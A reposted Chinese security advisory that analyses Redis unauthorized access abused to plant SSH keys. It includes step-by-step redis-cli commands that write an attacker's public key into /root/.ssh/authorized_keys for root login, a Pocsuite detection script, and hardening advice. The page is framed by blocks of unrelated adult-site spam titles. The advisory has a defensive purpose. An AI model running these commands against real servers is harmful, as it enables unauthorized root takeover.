亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 數據庫 > Redis > 正文

Redis未授權訪問配合SSH key文件利用詳解

2020-03-17 12:32:40
字體:
來源:轉載
供稿:網友

前言

Redis是一個開源的使用ANSI C語言編寫、支持網絡、可基于內存亦可持久化的日志型、Key-Value數據庫,并提供多種語言的API。

Redis 未授權訪問的問題是一直存在的問題,知道創宇安全研究團隊歷史上也做過相關的應急,今日,又出現 Redis 未授權訪問配合 SSH key 文件被利用的情況,導致一大批 Redis 服務器被黑,今天我們來簡要的分析下。

一、漏洞概述

Redis 默認情況下,會綁定在 0.0.0.0:6379,這樣將會將 Redis 服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問 Redis 以及讀取 Redis 的數據。攻擊者在未授權訪問 Redis 的情況下可以利用 Redis 的相關方法,可以成功在 Redis 服務器上寫入公鑰,進而可以使用對應私鑰直接登錄目標服務器。

1、漏洞描述

Redis 安全模型的觀念是: “請不要將 Redis 暴露在公開網絡中, 因為讓不受信任的客戶接觸到 Redis 是非常危險的” 。

Redis 作者之所以放棄解決未授權訪問導致的不安全性是因為, 99.99% 使用 Redis 的場景都是在沙盒化的環境中, 為了0.01%的可能性增加安全規則的同時也增加了復雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設計哲學中仍是不劃算的。

因為其他受信任用戶需要使用 Redis 或者因為運維人員的疏忽等原因,部分 Redis 綁定在 0.0.0.0:6379,并且沒有開啟認證(這是Redis 的默認配置),如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源 ip 訪問等,將會導致 Redis 服務直接暴露在公網上,導致其他用戶可以直接在非授權情況下直接訪問Redis服務并進行相關操作。

利用 Redis 自身的提供的 config 命令,可以進行寫文件操作,攻擊者可以成功將自己的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接使用對應的私鑰登錄目標服務器。

2、漏洞影響

Redis 暴露在公網(即綁定在0.0.0.0:6379,目標IP公網可訪問),并且沒有開啟相關認證和添加相關安全策略情況下可受影響而導致被利用。

通過ZoomEye 的搜索結果顯示,有97707在公網可以直接訪問的Redis服務。

Redis,未授權訪問,SSH,key

根據 ZoomEye 的探測,全球無驗證可直接利用Redis 分布情況如下:

Redis,未授權訪問,SSH,key

全球無驗證可直接利用Redis TOP 10國家與地區:

Redis,未授權訪問,SSH,key

3、漏洞分析與利用

首先在本地生產公私鑰文件:

$ssh-keygen –t rsa

Redis,未授權訪問,SSH,key

然后將公鑰寫入 foo.txt 文件

$ (echo -e "/n/n"; cat id_rsa.pub; echo -e "/n/n") > foo.txt

再連接 Redis 寫入文件

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit$ redis-cli -h 192.168.1.11$ 192.168.1.11:6379> config set dir /root/.ssh/OK$ 192.168.1.11:6379> config get dir1) "dir"2) "/root/.ssh"$ 192.168.1.11:6379> config set dbfilename "authorized_keys"OK$ 192.168.1.11:6379> saveOK

Redis,未授權訪問,SSH,key

這樣就可以成功的將自己的公鑰寫入 /root/.ssh 文件夾的 authotrized_keys 文件里,然后攻擊者直接執行:

$ ssh –i id_rsa root@192.168.1.11

即可遠程利用自己的私鑰登錄該服務器。

當然,寫入的目錄不限于 /root/.ssh 下的authorized_keys,也可以寫入用戶目錄,不過 Redis 很多以 root 權限運行,所以寫入 root 目錄下,可以跳過猜用戶的步驟。

4、Redis 未授權的其他危害與利用

a)數據庫數據泄露

Redis 作為數據庫,保存著各種各樣的數據,如果存在未授權訪問的情況,將會導致數據的泄露,其中包含保存的用戶信息等。

Redis,未授權訪問,SSH,key

b)代碼執行

Redis可以嵌套Lua腳本的特性將會導致代碼執行, 危害同其他服務器端的代碼執行, 樣例如下        一旦攻擊者能夠在服務器端執行任意代碼, 攻擊方式將會變得多且復雜, 這是非常危險的.

Redis,未授權訪問,SSH,key

通過Lua代碼攻擊者可以調用 redis.sha1hex() 函數,惡意利用 Redis 服務器進行 SHA-1 的破解。

c)敏感信息泄露

通過 Redis 的 INFO 命令, 可以查看服務器相關的參數和敏感信息, 為攻擊者的后續滲透做鋪墊。

Redis,未授權訪問,SSH,key

可以看到泄露了很多 Redis 服務器的信息, 有當前 Redis 版本, 內存運行狀態, 服務端個數等等敏感信息。

5、漏洞驗證

可以使用Pocsuite(http://github.com/knownsec/pocsuite)執行以下的代碼可以用于測試目標地址是否存在未授權的Redis服務。

#!/usr/bin/env python# -*- coding:utf-8 -*- import socketimport urlparsefrom pocsuite.poc import POCBase, Outputfrom pocsuite.utils import register  class TestPOC(POCBase): vulID = '89339' version = '1' author = ['Anonymous'] vulDate = '2015-10-26' createDate = '2015-10-26' updateDate = '2015-10-26' references = ['http://sebug.net/vuldb/ssvid-89339'] name = 'Redis 未授權訪問 PoC' appPowerLink = 'http://redis.io/' appName = 'Redis' appVersion = 'All' vulType = 'Unauthorized access' desc = '''  redis 默認不需要密碼即可訪問,黑客直接訪問即可獲取數據庫中所有信息,造成嚴重的信息泄露。 ''' samples = ['']  def _verify(self):  result = {}  payload = '/x2a/x31/x0d/x0a/x24/x34/x0d/x0a/x69/x6e/x66/x6f/x0d/x0a'  s = socket.socket()  socket.setdefaulttimeout(10)  try:   host = urlparse.urlparse(self.url).netloc   port = 6379   s.connect((host, port))   s.send(payload)   recvdata = s.recv(1024)   if recvdata and 'redis_version' in recvdata:    result['VerifyInfo'] = {}    result['VerifyInfo']['URL'] = self.url    result['VerifyInfo']['Port'] = port  except:   pass  s.close()  return self.parse_attack(result)  def _attack(self):  return self._verify()  def parse_attack(self, result):  output = Output(self)  if result:   output.success(result)  else:   output.fail('Internet nothing returned')  return output register(TestPOC)

二、安全建議

配置bind選項,限定可以連接Redis服務器的IP,修改 Redis 的默認端口6379

配置認證,也就是AUTH,設置密碼,密碼會以明文方式保存在Redis配置文件中

配置rename-command 配置項 “RENAME_CONFIG”,這樣即使存在未授權訪問,也能夠給攻擊者使用config 指令加大難度

好消息是Redis作者表示將會開發”real user”,區分普通用戶和admin權限,普通用戶將會被禁止運行某些命令,如config

總結

以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對VEVB武林網的支持。


注:相關教程知識閱讀請移步到Redis頻道。
發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
国产精品入口夜色视频大尺度| 尤物精品国产第一福利三区| 亚洲乱码国产乱码精品精| 国产精品中文字幕在线观看| 性夜试看影院91社区| 成人精品一区二区三区| 2018中文字幕一区二区三区| 国产成人av在线播放| 国产精品免费在线免费| 欧美激情精品久久久| 日韩欧美在线观看视频| 国产精品美女免费看| 黑人巨大精品欧美一区二区三区| 国产91av在线| 少妇激情综合网| 国产精品久久一区主播| 亚洲人成免费电影| 97人人模人人爽人人喊中文字| 影音先锋欧美在线资源| 国产精品www色诱视频| 欧美黄色片在线观看| 亚洲影视九九影院在线观看| 国产精品高清网站| 668精品在线视频| 久久成人18免费网站| 亚洲最大福利网站| 78m国产成人精品视频| 久久久久久18| 97在线精品国自产拍中文| 精品久久久久久中文字幕一区奶水| 成人女保姆的销魂服务| 色99之美女主播在线视频| 在线播放日韩专区| 国产原创欧美精品| 久久国产视频网站| 三级精品视频久久久久| 九色精品美女在线| 久久99精品久久久久久青青91| 久久久国产在线视频| 亚洲一区二区中文字幕| 亚洲男人天堂2019| 国产成一区二区| 亚洲人成网7777777国产| 精品亚洲一区二区三区在线播放| 永久555www成人免费| 国产一区玩具在线观看| 日韩中文字幕视频在线观看| 综合激情国产一区| 美女啪啪无遮挡免费久久网站| 久久视频国产精品免费视频在线| 欧美在线观看日本一区| 久久久久亚洲精品成人网小说| 国产精品一区二区三区久久久| 91中文字幕一区| 91精品国产网站| 日韩中文理论片| 精品国产乱码久久久久久婷婷| www.久久久久| 日韩在线观看免费高清完整版| 欧美午夜精品久久久久久久| 欧美性高潮床叫视频| 国产精品福利在线观看| 伊人久久五月天| 97久久精品人人澡人人爽缅北| 国产精品久久一| 日韩大片在线观看视频| 性金发美女69hd大尺寸| 中文字幕日韩欧美在线| 美女扒开尿口让男人操亚洲视频网站| 91久久精品一区| www.日韩.com| 亚洲伊人久久大香线蕉av| 26uuu另类亚洲欧美日本一| 51精品在线观看| 欧美天天综合色影久久精品| 精品国产欧美一区二区五十路| 久久婷婷国产麻豆91天堂| 国内精品久久久久久| 国产suv精品一区二区| 正在播放欧美视频| 国产精品吊钟奶在线| 成人免费视频网| 久久精品国产视频| 亚洲高清福利视频| 国产自摸综合网| 久久久人成影片一区二区三区| 日韩欧美在线中文字幕| 久久综合亚洲社区| 高清欧美性猛交xxxx黑人猛交| 国产精品三级美女白浆呻吟| 欧美性色视频在线| 亚洲国产精品va在线| 久久久久日韩精品久久久男男| 久久久久久久久久久成人| 精品久久久香蕉免费精品视频| 日韩中文字幕在线观看| 一本一道久久a久久精品逆3p| 欧美成年人视频网站| 亚洲美女性视频| 成人中文字幕+乱码+中文字幕| 日本乱人伦a精品| 久久视频中文字幕| 日韩精品视频在线观看网址| 久久综合伊人77777蜜臀| 亚洲老板91色精品久久| 久久综合色88| 欧美在线播放视频| 色综合天天综合网国产成人网| 久久久在线观看| 精品一区二区三区四区在线| 播播国产欧美激情| 国产精品第七影院| 欧美国产亚洲精品久久久8v| 国产成人精品a视频一区www| 日韩av理论片| 国产99在线|中文| 日韩在线视频观看正片免费网站| 69av在线播放| 亚洲欧美日韩第一区| 亚洲欧美中文日韩在线v日本| 尤物九九久久国产精品的特点| 亚洲人成电影在线观看天堂色| 最近2019中文字幕第三页视频| 91视频免费在线| 久久夜色精品亚洲噜噜国产mv| 亚洲欧美一区二区三区四区| 91香蕉嫩草神马影院在线观看| 久久91精品国产91久久久| 精品爽片免费看久久| 国产精品电影观看| 97超视频免费观看| 亚洲精品日韩欧美| 日本免费一区二区三区视频观看| 精品性高朝久久久久久久| 在线视频日韩精品| 一区二区三区亚洲| 国内精品久久影院| 久久久久久久久综合| 亚洲欧洲激情在线| 亚洲欧美在线x视频| 91最新在线免费观看| 黑丝美女久久久| 最好看的2019年中文视频| 精品国内亚洲在观看18黄| 亚洲黄色www| 美女视频黄免费的亚洲男人天堂| 日韩欧美在线中文字幕| 欧美最顶级丰满的aⅴ艳星| 欧美性少妇18aaaa视频| 亚洲欧美一区二区精品久久久| 国产精品高清免费在线观看| 日韩二区三区在线| 中文字幕在线精品| 黑人巨大精品欧美一区二区免费| 日韩网站免费观看| 欧美激情二区三区| 亚洲国产精品人久久电影| 综合激情国产一区| 欧美裸体xxxx极品少妇| 国产黑人绿帽在线第一区| 大荫蒂欧美视频另类xxxx| 亚洲欧美在线播放| 91精品在线观看视频| 国产精品精品国产|